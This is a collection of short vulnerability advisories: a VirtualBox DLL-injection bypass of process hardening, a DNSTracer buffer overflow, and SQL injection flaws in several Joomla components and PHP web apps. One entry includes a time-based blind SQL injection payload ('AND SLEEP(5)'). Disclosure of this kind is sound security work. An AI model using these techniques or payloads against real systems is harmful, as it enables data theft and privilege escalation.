The process hardening implemented by the VirtualBox driver can be circumvented to load arbitrary code inside a VirtualBox process giving access to the VBoxDrv driver which can allow routes to EoP from a normal user. The ring 3 process hardening in VirtualBox adds three hooks to module loading to try and prevent untrusted code being loaded into the process, LdrLoadDll, NtCreateSection and a LDR DLL notification. Each will try and verify a DLL load and either reject the load with an error or kill the process is it’s not possible to prevent it from occurring. Looking at the hooks there a couple of issues which when combined together allow a user to inject an arbitrary DLL into a protected process. The location checks are not very rigorous. As far as I can tell arbitrary files need to be owned by an admin/trustedinstaller but this check is waived if the file is in system32/WinSxS. However this doesn’t take into account that there are some directories which can be written to inside system32 such as Tasks. The code to enforce specific certificates doesn’t seem to be enabled so at the very least combined with 1, you can load any validly signed file. It might be considered that 2 isn’t an issue as getting a signing cert could be a sufficient burden for a “malicious” attacker, so instead it’s worth considering what else the weak path checking allows you to do. The handling of DLL paths has some interesting behaviours, most interestingly there’s the behaviour where if no file extension is added to the path then the loader will automatically append .DLL to it. This is actually imitated by the VirtualBox hooks, so if you pass a path without an extension then the hooks will also append .DLL to it. This means that if you can write a file to a directory which is in the system32 path then you can bypass the hooks and load arbitrary code.
DNSTracer 1.9 is vulnerable to a stack-based buffer overflow vulnerability. This vulnerability is caused by a lack of proper boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input that contains malicious code, which will be executed in the context of the application.
An attacker can exploit a SQL injection vulnerability in Joomla! Component StreetGuessr Game v1.1.8 by sending a malicious SQL query to the vulnerable application. This can be done by sending a specially crafted HTTP request containing a malicious SQL query to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database, modify or delete data, execute system level commands, and even gain access to the underlying server.
EDUMOD Pro is an advanced school management software based on web. It is developed with core PHP and mysql. An attacker can exploit the vulnerability by sending malicious payloads to the vulnerable URL http://localhost/students/search.php via POST method. The payloads can be used to extract sensitive information from the database.
Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. The vulnerability is a time-based blind SQL injection in the URI parameter #1* with the payload http://localhost/server/1 AND SLEEP(5).
A SQL injection vulnerability exists in Joomla! Component Ultimate Property Listing v1.0.2, which allows an attacker to execute arbitrary SQL commands via the 'sf_selectuser_id', 'sf_multiplelocation1_id', and 'sf_multiplelisting' parameters in the 'index.php' script.
An attacker can exploit a SQL injection vulnerability in Joomla! Component Event Registration Pro Calendar v4.1.3 by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or execute system level commands.
An attacker can inject arbitrary SQL commands into the 'cp_id' parameter of the 'index.php' script via the 'option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath' URL.
An attacker can exploit a SQL injection vulnerability in Joomla! Component PHP-Bridge v1.2.3 by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the ‘option’ and ‘view’ parameters to inject malicious SQL code into the application. The attacker can then use the ‘id’ parameter to execute the malicious SQL code.
An attacker can inject arbitrary SQL commands into the 'type' parameter of the 'index.php' script, allowing them to access, modify or delete data from the database.
Services By CQR